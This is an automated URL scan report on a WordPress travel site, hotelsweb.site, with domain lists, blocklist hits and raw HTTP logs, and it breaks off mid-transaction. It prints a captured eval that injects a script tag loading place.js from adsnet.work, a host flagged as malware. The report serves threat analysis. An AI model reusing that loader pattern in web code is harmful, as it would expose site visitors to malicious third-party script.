Overview

URL hotelsweb.site/
IP 199.250.192.223 (United States)
ASN #54641 IMH-IAD
UserAgent Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer
Report completed 2022-12-01 12:45:54 UTC
IDS alerts 0
Blocklist alert 27
urlquery alerts No alerts detected
Tags None

Domain Summary (13)

Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
push.services.mozilla.com (1) 2140 2014-10-24 08:27:06 UTC 2020-05-03 10:09:39 UTC 52.37.79.227
hotelsweb.site (5) 0 2020-02-02 06:48:20 UTC 2022-12-01 04:02:48 UTC 199.250.192.223 Unknown ranking
fonts.googleapis.com (1) 8877 2013-06-10 20:14:26 UTC 2022-12-01 04:19:36 UTC 142.250.74.106
adsnet.work (1) 0 2015-06-06 16:23:15 UTC 2022-11-28 16:54:42 UTC 193.3.19.36 Unknown ranking
ocsp.digicert.com (2) 86 2012-05-21 07:02:23 UTC 2020-05-02 20:58:10 UTC 93.184.220.29
content-signature-2.cdn.mozilla.net (1) 1152 No data No data 34.160.144.191
contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-12-01 04:11:13 UTC 34.117.237.239
img-getpocket.cdn.mozilla.net (6) 1631 2018-06-21 23:36:00 UTC 2020-02-19 04:43:25 UTC 34.120.237.76
www.hotelsweb.site (66) 0 No data No data 199.250.192.223 Unknown ranking
fonts.gstatic.com (4) 0 2014-09-09 00:40:21 UTC 2022-12-01 04:14:51 UTC 216.58.207.227 Domain (gstatic.com) ranked at: 540
hydrahydra.kim (1) 0 2021-10-19 18:50:29 UTC 2022-11-28 16:54:43 UTC 193.3.19.36 Unknown ranking
r3.o.lencr.org (6) 344 No data No data 23.33.119.27
firefox.settings.services.mozilla.com (2) 867 2020-06-04 20:08:41 UTC 2022-12-01 04:09:38 UTC 34.102.187.140

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro
 No alerts detected

Blocklists

OpenPhish
 No alerts detected

PhishTank
 No alerts detected

Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-12-01 2 hotelsweb.site/ Malware
2022-12-01 2 www.hotelsweb.site/ Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travelpayouts/app/public/themes/hotel (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travelpayouts/app/public/themes/railw (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/wp-travel-engine/public/css/wp-travel (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/themes/travel-agency/style.css?ver=1.1.6 Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travel-agency-companion/public/js/tra (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/wp-travel-engine/public/js/wp-travel- (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/wp-travel-engine/public/js/wpte-galle (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-includes/js/wp-emoji-release.min.js?ver=4.9.22 Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/elementor/assets/lib/font-awesome/css (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travel-agency-companion/public/css/od (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 Malware
2022-12-01 2 www.hotelsweb.site/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 Malware
2022-12-01 2 www.hotelsweb.site/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travelpayouts/app/public/js/lib/jquer (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travelpayouts/app/public/js/lib/pikaday.js Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travelpayouts/app/public/js/lib/date. (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travelpayouts/app/public/js/lib/pikad (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travelpayouts/app/public/js/site/TPPl (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4 Malware
2022-12-01 2 www.hotelsweb.site/wp-content/themes/travel-agency/js/wow.min.js?ver=1.1.6 Malware
2022-12-01 2 www.hotelsweb.site/wp-includes/js/wp-embed.min.js?ver=4.9.22 Malware
2022-12-01 2 www.hotelsweb.site/wp-content/themes/travel-agency/js/custom.min.js?ver=1.1.6 Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/elementor/assets/lib/font-awesome/fon (...) Malware
2022-12-01 2 adsnet.work/scripts/place.js Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travel-agency-companion/public/js/owl (...) Malware

mnemonic secure dns
 No alerts detected

Quad9 DNS
 No alerts detected


Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 3 reports on IP: 199.250.192.223
Date UQ / IDS / BL URL IP
2022-12-01 12:45:54 +0000 0 - 0 - 27 hotelsweb.site/ 199.250.192.223
2022-09-04 15:29:18 +0000 0 - 0 - 20 hotelsale.online/ 199.250.192.223
2022-09-01 13:26:19 +0000 0 - 0 - 20 hotelsale.online/ 199.250.192.223


Last 5 reports on ASN: IMH-IAD
Date UQ / IDS / BL URL IP
2023-01-29 20:05:54 +0000 0 - 0 - 1 jasonmaymusic.com/torquesound.com.zip 199.250.197.1
2023-01-29 20:05:52 +0000 0 - 0 - 1 jasonmaymusic.com/jasonmaymusic_all.zip 199.250.197.1
2023-01-29 20:05:48 +0000 0 - 0 - 1 jasonmaymusic.com/jasonmaymusic_all.zip 199.250.197.1
2023-01-29 20:05:47 +0000 0 - 0 - 1 jasonmaymusic.com/torquesound.com.zip 199.250.197.1
2023-01-29 18:33:50 +0000 0 - 0 - 2 miondropind.com/ 168.235.116.72


Last 1 reports on domain: hotelsweb.site
Date UQ / IDS / BL URL IP
2022-12-01 12:45:54 +0000 0 - 0 - 27 hotelsweb.site/ 199.250.192.223


No other reports with similar screenshot

JavaScript

Executed Scripts (31)

Executed Evals (1)
#1 JavaScript::Eval (size: 193) - SHA256: 0f6705141dd378bf24f739c6ab012da37c2cc4b42357ae7f2e03ae25903eebce
var script = document.createElement('script');
script.onload = function() {};
script.src = "https://adsnet.work/scripts/place.js";
document.getElementsByTagName('head')[0].appendChild(script);

Executed Writes (0)


HTTP Transactions (97)


Request Response
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.33.119.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "8EED57C91B42EF7B2D5EFF1309E306E23E13C3DE21219AF24A693CBF3E8977FC"
Last-Modified: Mon, 28 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=4956
Expires: Thu, 01 Dec 2022 14:08:19 GMT
Date: Thu, 01 Dec 2022 12:45:43 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 4427
Cache-Control: 'max-age=158059'
Date: Thu, 01 Dec 2022 12:45:43 GMT
Last-Modified: Thu, 01 Dec 2022 11:31:56 GMT
Server: ECS (ska/F70E)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Retry-After, Alert, Backoff, Content-Length, Content-Type
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Thu, 01 Dec 2022 12:19:46 GMT
cache-control: public,max-age=3600
age: 1557
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    14cd9a0afb6ba9a763651d5112760d1e
Sha1:   75d7b104ab9ab11fbb73c3f348b43b0119b5adfa
Sha256: 4e32a117106be587ffcd63239c16a8117eb7840830d4c9decf6527761967532e
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.33.119.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "F18AC558CB786126BB7EFB159E03353D268D5F5796BCFD2691A349DFC68D863C"
Last-Modified: Mon, 28 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6850
Expires: Thu, 01 Dec 2022 14:39:53 GMT
Date: Thu, 01 Dec 2022 12:45:43 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
x-amz-id-2: eTvajpA3ZWEA8tgfrj3nks2Wc8gy10MmLlnMQRHQAg96AcP77inRGyQJJ3phMUIiTd03QbDHdd0=
x-amz-request-id: Y36S7XDSBJA91GJ4
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Thu, 01 Dec 2022 12:45:40 GMT
age: 3
last-modified: Thu, 10 Nov 2022 09:21:27 GMT
etag: "9ebddc2b260d081ebbefee47c037cb28"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    9ebddc2b260d081ebbefee47c037cb28
Sha1:   492bad62a7ca6a74738921ef5ae6f0be5edebf39
Sha256: 74bbb7cba16f7d084a08a0907d47d7496e5c148f904707ec6950f8f6a61027e5
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Thu, 01 Dec 2022 12:45:43 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Last-Modified, Retry-After, Cache-Control, Content-Type, Pragma, Backoff, ETag, Expires, Content-Length, Alert
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Thu, 01 Dec 2022 12:08:56 GMT
cache-control: public,max-age=3600
age: 2207
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 4429
Cache-Control: max-age=164094
Date: Thu, 01 Dec 2022 12:45:44 GMT
Etag: "63886ea9-1d7"
Expires: Sat, 03 Dec 2022 10:20:38 GMT
Last-Modified: Thu, 01 Dec 2022 09:06:49 GMT
Server: ECS (ska/F70E)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: w4CYaFXbhvs34jOrfYiN4g==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         52.37.79.227
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: fn7ibkxylN/zHJQfnnuEKknxKC0=

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.33.119.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "D469C5ADB69F261084B016F8E24EDF8B69B62D9F930CA2D85CF35375E2303ECC"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14904
Expires: Thu, 01 Dec 2022 16:54:09 GMT
Date: Thu, 01 Dec 2022 12:45:45 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.33.119.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "D469C5ADB69F261084B016F8E24EDF8B69B62D9F930CA2D85CF35375E2303ECC"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14904
Expires: Thu, 01 Dec 2022 16:54:09 GMT
Date: Thu, 01 Dec 2022 12:45:45 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.33.119.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "D469C5ADB69F261084B016F8E24EDF8B69B62D9F930CA2D85CF35375E2303ECC"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14904
Expires: Thu, 01 Dec 2022 16:54:09 GMT
Date: Thu, 01 Dec 2022 12:45:45 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F881a33ae-e81b-4603-85d9-a2242b17be66.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 4803
x-amzn-requestid: ad2d9243-5e32-4faf-8ff3-b9abd3af1e89
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cb1_hEJJIAMF4Vg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6387d063-596f5833509112ee6cbedf54;Sampled=0
x-amzn-remapped-date: Wed, 30 Nov 2022 21:51:31 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: jM-fTqLsmU3c_gc9Wle-lvCwXelA9Sid9axtzJQDsfOHv23yUbKsBw==
via: 1.1 2dc111aa3ead15d061e41a423155a53a.cloudfront.net (CloudFront), 1.1 943c6a4d4ee43b18ee91634536f53eae.cloudfront.net (CloudFront), 1.1 google
date: Wed, 30 Nov 2022 22:43:35 GMT
age: 50530
etag: "cedf2f21be7cd366bd46055b62b5513db3011dfc"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4803
Md5:    cc0a257323f882caff067adb86d906e4
Sha1:   cedf2f21be7cd366bd46055b62b5513db3011dfc
Sha256: c16a9296d5e840a468fef7fb2764b9f7d4b3131d7ade2ce4999de1eead5469e0
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F966ff24e-ea85-4a2e-aead-22f1a723c59f.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 9674
x-amzn-requestid: 7e7d0183-9667-462a-8d44-d125998c1ae3
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cYgEoHVAoAMFvAQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63867a1d-280ba97e3fe1bf7244cbde35;Sampled=0
x-amzn-remapped-date: Tue, 29 Nov 2022 21:31:09 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: ym_L3s5E6MLy6BxqNkVxok6L6hA4c-ilSsEqt42j2IbiXYPb4c6-VQ==
via: 1.1 26ca01ec7377e425b59b6a08cb1ec342.cloudfront.net (CloudFront), 1.1 6a9b42e38e76b7d4a4044ebe0e0eca08.cloudfront.net (CloudFront), 1.1 google
date: Wed, 30 Nov 2022 21:52:57 GMT
age: 53568
etag: "53650399f9a986ba54addd668b4557109d12003b"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   9674
Md5:    5508d05a290b663fd89ead9b58f2efd8
Sha1:   53650399f9a986ba54addd668b4557109d12003b
Sha256: 65704a961410fdd318c491fedf002c8e9b184cd34b76fe1b67026d42ce21be3f
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F600016d1-5abb-4a6c-996a-933a8d4bc6df.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8740
x-amzn-requestid: c6c3e3dc-c9a2-4fda-a83b-cdd6ae81166b
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cP7uyE9CoAMF6Xg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63830cc4-2c8940405044071a082ee678;Sampled=0
x-amzn-remapped-date: Sun, 27 Nov 2022 07:07:48 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: qykE_oaoqqPTgqGnfUo74mH29IOS97b5sZb_3VmB9yW7KUiJ1a7dnA==
via: 1.1 1cc6ed0d2d3dd9529ce544f9dfe61a52.cloudfront.net (CloudFront), 1.1 61bc723adb3b1884ed759711e84e13a8.cloudfront.net (CloudFront), 1.1 google
date: Wed, 30 Nov 2022 18:58:06 GMT
age: 64059
etag: "2e62f9ed8f5e7b2f888a73320dd98b0cda9303b8"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8740
Md5:    26d6dffbf400da4803a2e76e2a8ef2f8
Sha1:   2e62f9ed8f5e7b2f888a73320dd98b0cda9303b8
Sha256: 04c6e31623fe48cbe83dc91635bfa47b337590f18919995b08d5bde27e929e03
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb0e1339e-3c63-4033-8b5b-e21137509777.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 16038
x-amzn-requestid: 925134ee-dd35-45ed-8da7-d60c9c484993
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cbz80EHboAMFtmQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6387cd1e-48de287757e82632291365ee;Sampled=0
x-amzn-remapped-date: Wed, 30 Nov 2022 21:37:34 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: I8qQQUMSVzFmXqjWM1n_F1XEE-ZQcpEF81OwJgf9i3Q5M8XiFAa8Zg==
via: 1.1 a20e81b65d2465c729ce2f6bfe539dd0.cloudfront.net (CloudFront), 1.1 7e87179efaa9e3c316bd3d3a74cfded8.cloudfront.net (CloudFront), 1.1 google
date: Wed, 30 Nov 2022 21:52:00 GMT
age: 53625
etag: "5cf9a7a784952e1bb0cbe499104f1774b1269d08"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   16038
Md5:    ffd12f9c423ffc627d9e3b3145944fe4
Sha1:   5cf9a7a784952e1bb0cbe499104f1774b1269d08
Sha256: a25f1b752d9af599aefd73073c105853130f1759905269de3d582d2eb35fe167
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F051e025a-c892-4a7d-8a1d-95f6d77ebb3c.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 4762
x-amzn-requestid: 52b09ca3-705b-4c86-9f56-172637553f87
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cP7TVG58oAMFQTw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63830c15-4577a47243ad190672f8ac89;Sampled=0
x-amzn-remapped-date: Sun, 27 Nov 2022 07:04:53 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: Y0-NAp2LMMG5TjQQ9ENHwDyKXLObKTYqzPPOWvZhs7Y9WJIC6LoblQ==
via: 1.1 2dc111aa3ead15d061e41a423155a53a.cloudfront.net (CloudFront), 1.1 d6b180eb367f7de26d67a9f3901b96a6.cloudfront.net (CloudFront), 1.1 google
date: Thu, 01 Dec 2022 05:45:16 GMT
age: 25229
etag: "fa2217bae05b7beca2e12597eaad835298276b82"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4762
Md5:    d2dd5a4bcfd47db8f38544bf39ce3031
Sha1:   fa2217bae05b7beca2e12597eaad835298276b82
Sha256: 3266004f5e73af5359b71622eea31f1e28abb4bbc443b5f9e481b5a8b2e9249e
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F83cd87b8-4041-419b-ab34-9f8e5a326f4b.jpeg HTTP/1.1 
